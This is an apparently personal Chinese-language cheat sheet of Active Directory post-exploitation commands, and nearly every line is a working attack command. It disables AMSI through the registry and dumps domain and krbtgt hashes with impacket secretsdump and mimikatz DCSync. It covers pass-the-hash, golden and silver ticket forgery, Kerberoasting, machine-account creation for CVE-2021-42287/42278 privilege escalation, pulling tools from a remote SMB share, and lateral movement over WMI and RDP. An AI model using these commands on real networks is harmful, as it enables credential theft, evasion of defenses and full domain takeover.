内网工具包

目录

关闭amsi

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

恢复命令

New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null

设置可加载脚本

set-executionpolicy remotesigned

查看函数帮助文档

function_name -?
get-help function_name -examples
get-help function_name -detailed


将powershell结果输出保存

|out-file -filepath c:/xx/x/xx

impacket

Python写的的内网工具包

教程https://xz.aliyun.com/t/11877

通用选项

hash认证

py -3  xxx.py  domain/user@ip -hashes :161cff084477fe596a5db81874498a24

Kerberos认证

export KRB5CCNAME=ad01.ccache 
py -3  xxx.py  -k -no-pass

secretsdump dumphash

基于NTLM认证,使用机器用户导出

py -3 secretsdump.py -hashes 5f8506740ed68996ffd4e5cf80cb5174:5f8506740ed68996ffd4e5cf80cb5174 "domain/DC$@DCIP" -just-dc-user krbtgt

基于Kerberos票据导出

export KRB5CCNAME=ad01.ccache 

py -3 [secretsdump.py](http://secretsdump.py) -k -no-pass [AD01.test.com](http://AD01.test.com) -dc-ip 192.168.111.146 -target-ip 192.168.111.146 -just-dc-user krbtgt

本地解密SAM

py -3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

wmiexec pth

横向脚本

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24 Administrator@10.10.10.10

ticketer 金银票据伪造

银票

使用win-7\$的机器账户的hash96dd976cc094ca1ddb2f06476fb61eb6伪造cifs/win-7的服务票据,使用票据的用户是根本不存在的qqq或者存在的任意用户。

py -3 .\ticketer.py -spn cifs/win-7 -domain-sid S-1-5-21-2799988422-2257142125-1453840996 -domain test.com -nthash 96dd976cc094ca1ddb2f06476fb61eb6 qqq

金牌

在银票的命令基础上去掉-spn,将nthash修改为krbtgt的hash即可。

py -3 .\ ticketer.py  -domain-sid S-1-5-21-2799988422-2257142125-1453840996 -domain  test.com  -nthash 96dd976cc094ca1ddb2f06476fb61eb6 qqq

ticketConverter ccache与kirbi互转脚本

py -3 .\ticketConverter.py .\administrator.ccache .\administrator.kirbi

GetUserSPNs 查询域内SPN

可使用密码认证、hash认证、Kerberos认证

py -3 GetUserSPNs.py test.com/administrator:1qaz@WSX -target-domain test.com

smbserver 搭建smb服务器

python smbserver.py demo /opt/

远程拉文件 copy samrdump.exe \\192.168.3.137\demo

远程读注册表

有时候拿到hash或密码不能直接pth上去,可以读注册表看看有什么发现

impacket-reg -hashes ':e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\SOFTWARE -s > henry_reg.txt

empire

mimikatz

不解释

DCsync

# 导出域内指定用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /user:administrator 
lsadump::dcsync /domain:whoamianony.org /user:administrator /csv

# 导出域内所有用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /all    
lsadump::dcsync /domain:whoamianony.org /all /csv

pth

sekurlsa::pth /user:administrator /domain:"xxx.com" /ntlm:6542d35ed5ff6ae5e75b875068c5d3bc  //自行修改
然后会弹出管理员cmd shell
试试读域控文件 net use \\192.168.222.131\c$

黄金票据

wmic useraccount get name,sid 获取sid

这里得到 administrator 的 SID 为 S-1-5-21-284927032-1122706408-2778656994-500,即表示当前域的 SID 就是 S-1-5-21-284927032-1122706408-2778656994(用的时候去掉最后的‐500,500表示为administrator用户)

mimikatz lsadump::dcsync /domain:hack.com /user:krbtgt 导出krbtgt hash

mimikatz kerberos::purge 
清除已有票据

kerberos::golden /admin:administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:golden.kiribi 
生成黄金票据,并保存到golden.kiribi

kerberos::ptt golden.kiribi
导入黄金票据到内存

ls \\dc\c$ 利用

powersploit

ps1的内网工具包

powerview

信息搜集工具

查看域信任

get-domaintrust -domain name 

查看acl

Get-ObjectAcl -samAccountName username -ResolveGUIDs

Rubeus

滥用Kerberos的工具

获取tgt

impacket也可以做到

Rubeus.exe asktgt /user:DC /password:******* /domain:attack.local /dc:attack.local /nowrap

Powermad

用于与机器账户交涉。如CVE-2021-42287\&CVE-2021-42278 域内提权,可用它来创建机器用户

Import-Module .\Powermad.ps1;New-MachineAccount -MachineAccount hacksystem -Password $(ConvertTo-SecureString "hack" -AsPlainText -Force)

SharpRDP

使用rdp协议进行横向,可以绕过smb不可用等情况

https://github.com/0xthirteen/SharpRDP